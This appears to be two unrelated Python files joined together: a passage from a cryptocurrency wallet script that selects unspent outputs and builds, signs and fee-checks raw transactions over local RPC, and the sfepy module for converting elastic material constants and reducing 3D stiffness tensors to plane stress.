sys.stderr.write("RPC server at "+connect+" testnet setting mismatch\n")
sys.exit(1)
return result
except:
sys.stderr.write("Error connecting to RPC server at "+connect+"\n")
sys.exit(1)
def unlock_wallet(oned):
info = oned.getinfo()
if 'unlocked_until' not in info:
return True # wallet is not encrypted
t = int(info['unlocked_until'])
if t <= time.time():
try:
passphrase = getpass.getpass("Wallet is locked; enter passphrase: ")
oned.walletpassphrase(passphrase, 5)
except:
sys.stderr.write("Wrong passphrase\n")
info = oned.getinfo()
return int(info['unlocked_until']) > time.time()
def list_available(oned):
address_summary = dict()
address_to_account = dict()
for info in oned.listreceivedbyaddress(0):
address_to_account[info["address"]] = info["account"]
unspent = oned.listunspent(0)
for output in unspent:
# listunspent doesn't give addresses, so:
rawtx = oned.getrawtransaction(output['txid'], 1)
vout = rawtx["vout"][output['vout']]
pk = vout["scriptPubKey"]
# This code only deals with ordinary pay-to-one-address
# or pay-to-script-hash outputs right now; anything exotic is ignored.
if pk["type"] != "pubkeyhash" and pk["type"] != "scripthash":
continue
address = pk["addresses"][0]
if address in address_summary:
address_summary[address]["total"] += vout["value"]
address_summary[address]["outputs"].append(output)
else:
address_summary[address] = {
"total" : vout["value"],
"outputs" : [output],
"account" : address_to_account.get(address, "")
}
return address_summary
def select_coins(needed, inputs):
# Feel free to improve this, this is good enough for my simple needs:
outputs = []
have = Decimal("0.0")
n = 0
while have < needed and n < len(inputs):
outputs.append({ "txid":inputs[n]["txid"], "vout":inputs[n]["vout"]})
have += inputs[n]["amount"]
n += 1
return (outputs, have-needed)
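# Worked example (illustrative): with unspent inputs of 0.5 and 0.7 BTC and
# needed=Decimal("1.0"), select_coins gathers both outputs and returns change
# of Decimal("0.2").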
def create_tx(oned, fromaddresses, toaddress, amount, fee):
all_coins = list_available(oned)
total_available = Decimal("0.0")
needed = amount+fee
potential_inputs = []
for addr in fromaddresses:
if addr not in all_coins:
continue
potential_inputs.extend(all_coins[addr]["outputs"])
total_available += all_coins[addr]["total"]
if total_available < needed:
sys.stderr.write("Error, only %f BTC available, need %f\n"%(total_available, needed));
sys.exit(1)
#
# Note:
# Python's json/jsonrpc modules have inconsistent support for Decimal numbers.
# Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode
# Decimals, I'm casting amounts to float before sending them to oned.
#
outputs = { toaddress : float(amount) }
(inputs, change_amount) = select_coins(needed, potential_inputs)
if change_amount > BASE_FEE: # don't bother with zero or tiny change
change_address = fromaddresses[-1]
if change_address in outputs:
outputs[change_address] += float(change_amount)
else:
outputs[change_address] = float(change_amount)
rawtx = oned.createrawtransaction(inputs, outputs)
signed_rawtx = oned.signrawtransaction(rawtx)
if not signed_rawtx["complete"]:
sys.stderr.write("signrawtransaction failed\n")
sys.exit(1)
txdata = signed_rawtx["hex"]
return txdata
def compute_amount_in(oned, txinfo):
result = Decimal("0.0")
for vin in txinfo['vin']:
in_info = oned.getrawtransaction(vin['txid'], 1)
vout = in_info['vout'][vin['vout']]
result = result + vout['value']
return result
def compute_amount_out(txinfo):
result = Decimal("0.0")
for vout in txinfo['vout']:
result = result + vout['value']
return result
def sanity_test_fee(oned, txdata_hex, max_fee):
class FeeError(RuntimeError):
pass
try:
txinfo = oned.decoderawtransaction(txdata_hex)
total_in = compute_amount_in(oned, txinfo)
total_out = compute_amount_out(txinfo)
if total_in-total_out > max_fee:
raise FeeError("Rejecting transaction, unreasonable fee of "+str(total_in-total_out))
tx_size = len(txdata_hex)/2
kb = tx_size/1000 # integer division rounds down
        if kb > 1 and (total_in-total_out) < BASE_FEE:  # 'fee' was an undefined name here; use the actual fee
            raise FeeError("Rejecting no-fee transaction, larger than 1000 bytes")
        if total_in < 0.01 and (total_in-total_out) < BASE_FEE:
            raise FeeError("Rejecting no-fee, tiny-amount transaction")
# Exercise for the reader: compute transaction priority, and
# warn if this is a very-low-priority transaction
except FeeError as err:
sys.stderr.write((str(err)+"\n"))
sys.exit(1)
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--from", dest="fromaddresses", default=None,
help="addresses to get ones from")
parser.add_option("--to", dest="to", default=None,
help="address to get send ones to")
parser.add_option("--amount", dest="amount", default=None,
help="amount to send")
parser.add_option("--fee", dest="fee", default="0.0",
help="fee to include")
parser.add_option("--datadir", dest="datadir", default=determine_db_dir(),
help="location of one.conf file with RPC username/password (default: %default)")
parser.add_option("--testnet", dest="testnet", default=False, action="store_true",
help="Use the test network")
parser.add_option("--dry_run", dest="dry_run", default=False, action="store_true",
help="Don't broadcast the transaction, just create and print the transaction data")
(options, args) = parser.parse_args()
check_json_precision()
config = read_bitcoin_config(options.datadir)
if options.testnet: config['testnet'] = True
oned = connect_JSON(config)
if options.amount is None:
address_summary = list_available(oned)
for address,info in address_summary.iteritems():
n_transactions = len(info['outputs'])
if n_transactions > 1:
print("%s %.8f %s (%d transactions)"%(address, info['total'], info['account'], n_transactions))
else:
print("%s %.8f %s"%(address, info['total'], info['account']))
else:
fee = Decimal(options.fee)
amount = Decimal(options.amount)
        while not unlock_wallet(oned):
            pass # Keep asking for passphrase until they get it right
txdata = create_tx(oned, options.fromaddresses.split(","), options.to, amount, fee)
sanity_test_fee(oned, txdata, amount*Decimal("0.01"))
if options.dry_run:
print(txdata)
else:
txid = oned.sendrawtransaction(txdata)
print(txid)
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
from sfepy.base.base import *
##
# c: 22.07.2008
def youngpoisson_to_lame( young, poisson, plane = 'strain' ):
r"""
The relationship between Lame parameters and Young's modulus, Poisson's
ratio (see [1],[2]):
.. math::
\lambda = {\nu E \over (1+\nu)(1-2\nu)},\qquad \mu = {E \over 2(1+\nu)}
    The plane stress hypothesis:
.. math::
\bar\lambda = {2\lambda\mu \over \lambda + 2\mu}
[1] I.S. Sokolnikoff: Mathematical Theory of Elasticity. New York, 1956.
[2] T.J.R. Hughes: The Finite Element Method, Linear Static and Dynamic
Finite Element Analysis. New Jersey, 1987.
"""
mu = young/(2.0*(1.0 + poisson))
lam = young*poisson/((1.0 + poisson)*(1.0 - 2.0*poisson))
if plane == 'stress':
lam = 2*lam*mu/(lam + 2*mu)
return lam, mu
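# Worked example (illustrative): steel-like values young=210e9, poisson=0.3
# give mu = 210e9/2.6 ~ 8.08e10 and lam = 63e9/0.52 ~ 1.21e11 (plane strain).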
##
# c: 22.07.2008
def stiffness_tensor_lame( dim, lam, mu ):
r"""
Stiffness tensor - using Lame coefficients
.. math::
{\bm D}_{(2D)} = \begin{bmatrix} \lambda + 2\mu & \lambda & 0\\
\lambda & \lambda + 2\mu & 0\\ 0 & 0 & \mu \end{bmatrix}
.. math::
{\bm D}_{(3D)} = \begin{bmatrix} \lambda + 2\mu & \lambda &
\lambda & 0 & 0 & 0\\ \lambda & \lambda + 2\mu & \lambda & 0 & 0 & 0 \\
\lambda & \lambda & \lambda + 2\mu & 0 & 0 & 0 \\ 0 & 0 & 0 & \mu & 0 &
0 \\ 0 & 0 & 0 & 0 & \mu & 0 \\ 0 & 0 & 0 & 0 & 0 & \mu\\ \end{bmatrix}
"""
sym = (dim + 1) * dim / 2
o = nm.array( [1.] * dim + [0.] * (sym - dim), dtype = nm.float64 )
oot = nm.outer( o, o )
return lam * oot + mu * nm.diag( o + 1.0 )
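# For dim = 2: sym = 3 and o = [1, 1, 0], so lam*outer(o, o) + mu*diag([2, 2, 1])
# reproduces the 2D matrix in the docstring above.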
##
# c: 22.07.2008
def stiffness_tensor_youngpoisson( dim, young, poisson, plane = 'strain' ):
lam, mu = youngpoisson_to_lame( young, poisson, plane )
return stiffness_tensor_lame( dim, lam, mu )
##
# c: 10.08.2009
def stiffness_tensor_lame_mixed( dim, lam, mu ):
r"""
Stiffness tensor - using Lame coefficients
.. math::
{\bm D}_{(2D)} = \begin{bmatrix} \widetilde\lambda + 2\mu &
\widetilde\lambda & 0\\ \widetilde\lambda & \widetilde\lambda + 2\mu &
0\\ 0 & 0 & \mu \end{bmatrix}
.. math::
{\bm D}_{(3D)} = \begin{bmatrix} \widetilde\lambda + 2\mu &
\widetilde\lambda & \widetilde\lambda & 0 & 0 & 0\\ \widetilde\lambda &
\widetilde\lambda + 2\mu & \widetilde\lambda & 0 & 0 & 0 \\
\widetilde\lambda & \widetilde\lambda & \widetilde\lambda + 2\mu & 0 &
0 & 0 \\ 0 & 0 & 0 & \mu & 0 & 0 \\ 0 & 0 & 0 & 0 & \mu & 0 \\ 0 & 0 &
0 & 0 & 0 & \mu\\ \end{bmatrix}
where
.. math::
\widetilde\lambda = {2\over 3} (\lambda - \mu)
"""
sym = (dim + 1) * dim / 2
o = nm.array( [1.] * dim + [0.] * (sym - dim), dtype = nm.float64 )
oot = nm.outer( o, o )
return 2.0/3.0*(lam-mu) * oot + mu * nm.diag( o + 1.0 )
##
# c: 10.08.2009
def stiffness_tensor_youngpoisson_mixed( dim, young, poisson, plane = 'strain' ):
lam, mu = youngpoisson_to_lame( young, poisson, plane )
return stiffness_tensor_lame_mixed( dim, lam, mu )
##
# c: 10.08.2009
def bulk_modulus_lame( lam, mu ):
r"""
Bulk modulus - using Lame coefficients
.. math::
\gamma = {1\over 3}(\lambda + 2\mu)
"""
return 1.0/3.0 * (2*mu + lam)
##
# c: 10.08.2009
def bulk_modulus_youngpoisson( young, poisson, plane = 'strain' ):
lam, mu = youngpoisson_to_lame( young, poisson, plane )
return bulk_modulus_lame( lam, mu )
elastic_constants_relations = {
}
class ElasticConstants(Struct):
r"""
Conversion formulas for various groups of elastic constants. The elastic
constants supported are:
- :math:`E` : Young's modulus
- :math:`\nu` : Poisson's ratio
- :math:`K` : bulk modulus
- :math:`\lambda` : Lamé's first parameter
- :math:`\mu, G` : shear modulus, Lamé's second parameter
- :math:`M` : P-wave modulus, longitudinal wave modulus
The elastic constants are referred to by the following keyword arguments:
young, poisson, bulk, lam, mu, p_wave.
Exactly two of them must be provided to the __init__() method.
Examples
--------
- basic usage::
>>> from sfepy.mechanics.matcoefs import ElasticConstants
>>> ec = ElasticConstants(lam=1.0, mu=1.5)
>>> ec.young
3.6000000000000001
>>> ec.poisson
0.20000000000000001
>>> ec.bulk
2.0
>>> ec.p_wave
4.0
>>> ec.get(['bulk', 'lam', 'mu', 'young', 'poisson', 'p_wave'])
[2.0, 1.0, 1.5, 3.6000000000000001, 0.20000000000000001, 4.0]
- reinitialize existing instance::
>>> ec.init(p_wave=4.0, bulk=2.0)
>>> ec.get(['bulk', 'lam', 'mu', 'young', 'poisson', 'p_wave'])
[2.0, 1.0, 1.5, 3.6000000000000001, 0.20000000000000001, 4.0]
"""
def __init__(self, young=None, poisson=None, bulk=None, lam=None,
mu=None, p_wave=None, _regenerate_relations=False):
"""
Set exactly two of the elastic constants, and compute the remaining.
"""
self.names = ['bulk', 'lam', 'mu', 'young', 'poisson', 'p_wave']
if _regenerate_relations:
self.relations = self._construct_relations()
else:
from elastic_constants import relations
self.relations = relations
## print sorted(self.relations.keys())
## print len(self.relations)
self.init(young=young, poisson=poisson, bulk=bulk, lam=lam,
mu=mu, p_wave=p_wave)
def _construct_relations(self):
"""
        Construct the dictionary of all relations among the six elastic
        constants and save it as the `elastic_constants.py` module, which can
        be imported for reuse. Users should not call this!
"""
import sympy as sm
relations = {}
def _expand_keys(sols):
for key, val in sols.iteritems():
if len(val) == 2 and (key.name == 'poisson'):
val = val[0]
else:
val = val[-1]
skey = tuple(sorted([ii.name for ii in val.atoms()
if ii.is_Symbol])) + (key.name,)
if skey in relations:
print '!', skey
relations[skey] = val
bulk, lam, mu, young, poisson, p_wave = sm.symbols(self.names, real=True)
_expand_keys(sm.solve(bulk - (lam + 2 * mu / 3)))
_expand_keys(sm.solve(young - (mu * (3 * lam + 2 * mu) / (lam + mu))))
_expand_keys(sm.solve(poisson - (lam / (2 * (lam + mu)))))
_expand_keys(sm.solve(p_wave - (lam + 2 * mu)))
_expand_keys(sm.solve(bulk - (young / (3 * (1 - 2 * poisson)))))
_expand_keys(sm.solve(p_wave - ((young * (1 - poisson))
/ ((1 + poisson) * (1 - 2 * poisson)))))
# Choose the correct root manually.
## relations[('p_wave', 'young', 'poisson')] \
## = (young - p_wave + (-10*p_wave*young + young**2 +
## 9*p_wave**2)**(0.5))/(4*p_wave)
_expand_keys(sm.solve(lam - (young * poisson
/ ((1 + poisson) * (1 - 2 * poisson)))))
# Choose the correct root.
## relations[('lam', 'young', 'poisson')] \
## = (lam + young - (2*lam*young + young**2 +
## 9*(lam**2))**(0.5))/(-4*lam)
_expand_keys(sm.solve(mu - (young / (2 * (1 + poisson)))))
_expand_keys(sm.solve(bulk - (young * mu / (3 * (3 * mu - young)))))
_expand_keys(sm.solve(p_wave - (mu * (4 * mu - young)
/ (3 * mu - young))))
_expand_keys(sm.solve(young - (9 * bulk * (bulk - lam)
/ (3 * bulk - lam))))
_expand_keys(sm.solve(poisson - (lam / (3 * bulk - lam))))
_expand_keys(sm.solve(p_wave - (3 * bulk - 2 * lam)))
_expand_keys(sm.solve(poisson - ((3 * bulk - 2 * mu)
/ (2 * (3 * bulk + mu)))))
_expand_keys(sm.solve(p_wave - (bulk + 4 * mu / 3)))
_expand_keys(sm.solve(p_wave - (lam * (1 - poisson) / poisson)))
_expand_keys(sm.solve(p_wave - (2 * mu * (1 - poisson)
/ (1 - 2 * poisson))))
_expand_keys(sm.solve(p_wave - (3 * bulk * (1 - poisson)
/ (1 + poisson))))
_expand_keys(sm.solve(p_wave - (3 * bulk * (3 * bulk + young)
/ (9 * bulk - young))))
_expand_keys(sm.solve(young - ((lam*p_wave + p_wave**2 - 2*lam**2)
/ (lam + p_wave))))
fd = open(os.path.join(os.path.dirname(__file__),
'elastic_constants.py'), 'w')
fd.write("""
from __future__ import division
import sympy as sm
names = ['bulk', 'lam', 'mu', 'young', 'poisson', 'p_wave']
bulk, lam, mu, young, poisson, p_wave = sm.symbols(names, real=True)
relations = {
%s
}
""" % ',\n'.join([' %s : %s' % (key, val)
for key, val in relations.iteritems()]))
fd.close()
return relations
def init(self, young=None, poisson=None, bulk=None, lam=None,
mu=None, p_wave=None):
"""
Set exactly two of the elastic constants, and compute the
remaining. (Re)-initializes the existing instance of ElasticConstants.
"""
Struct.__init__(self, young=young, poisson=poisson, bulk=bulk, lam=lam,
mu=mu, p_wave=p_wave)
values = {}
for key, val in self.__dict__.iteritems():
if (key in self.names) and (val is not None):
values[key] = val
known = values.keys()
if len(known) != 2:
raise ValueError('exactly two elastic constants must be provided!')
unknown = set(self.names).difference(known)
for name in unknown:
key = tuple(sorted(known)) + (name,)
val = float(self.relations[key].n(subs=values))
setattr(self, name, val)
def get(self, names):
"""
Get the named elastic constants.
"""
out = [getattr(self, name) for name in names]
return out
class TransformToPlane( Struct ):
"""Transformmations of constitutive law coefficients of 3D problems to 2D."""
def __init__( self, iplane = None ):
"""`iplane` ... vector of indices denoting the plane, e.g.: [0, 1]"""
if iplane is None:
iplane = [0, 1]
# Choose the "master" variables and the "slave" ones
# ... for vectors
i_m = nm.sort( iplane )
i_s = nm.setdiff1d( nm.arange( 3 ), i_m )
# ... for second order tensors (symmetric storage)
i_ms = {(0, 1) : [0, 1, 3],
(0, 2) : [0, 2, 4],
(1, 2) : [1, 2, 5]}[tuple( i_m )]
i_ss = nm.setdiff1d( nm.arange( 6 ), i_ms )
Struct.__init__( self, iplane = iplane,
i_m = i_m, i_s = i_s,
i_ms = i_ms, i_ss = i_ss )
def tensor_plane_stress( self, c3 = None, d3 = None, b3 = None ):
"""Transforms all coefficients of the piezoelectric constitutive law
from 3D to plane stress problem in 2D: strain/stress ordering/ 11 22
33 12 13 23. If `d3` is None, uses only the stiffness tensor `c3`.
`c3` ... stiffness tensor
`d3` ... dielectric tensor
`b3` ... piezoelectric coupling tensor"""
mg = nm.meshgrid
cs = c3[mg(self.i_ss,self.i_ss)]
cm = c3[mg(self.i_ss,self.i_ms)].T
if d3 is None: # elasticity only.
A = cs
Feps = cm
Ainv = nm.linalg.inv( A )
c2 = c3[mg(self.i_ms,self.i_ms)] \
- nm.dot( Feps.T, nm.dot( Ainv, Feps ) )
return c2
else:
dm = d3[mg(self.i_s,self.i_m)].T
ds = d3[mg(self.i_s,self.i_s)]
ii = mg( self.i_s, self.i_ss )
A = nm.r_[nm.c_[cs, b3[ii]],
nm.c_[b3[ii].T, -ds]] #=> sym !!!
F = nm.r_[nm.c_[cm, b3[mg(self.i_m,self.i_ss)]],
nm.c_[b3[mg(self.i_s,self.i_ms)].T, -dm ]]
Feps = F[:,:3]
FE = F[:,3:]
Ainv = nm.linalg.inv( A )
c2 = c3[mg(self.i_ms,self.i_ms)] \
- nm.dot( Feps.T, nm.dot( Ainv, Feps ) )
d2 = d3[mg(self.i_m,self.i_m)] \
- nm.dot( FE.T, nm.dot( Ainv, FE ) )
b2 = b3[mg(self.i_m,self.i_ms)].T \
- nm.dot( FE.T, nm.dot( Ainv, Feps ) )
return c2, d2, b2
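# A minimal usage sketch (illustrative): reduce a 3D stiffness tensor to its
# 2D plane-stress counterpart in the xy-plane:
#
# c3 = stiffness_tensor_lame(3, lam=1.21e11, mu=8.08e10)
# tp = TransformToPlane(iplane=[0, 1])
# c2 = tp.tensor_plane_stress(c3=c3)   # 3x3 reduced stiffness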
|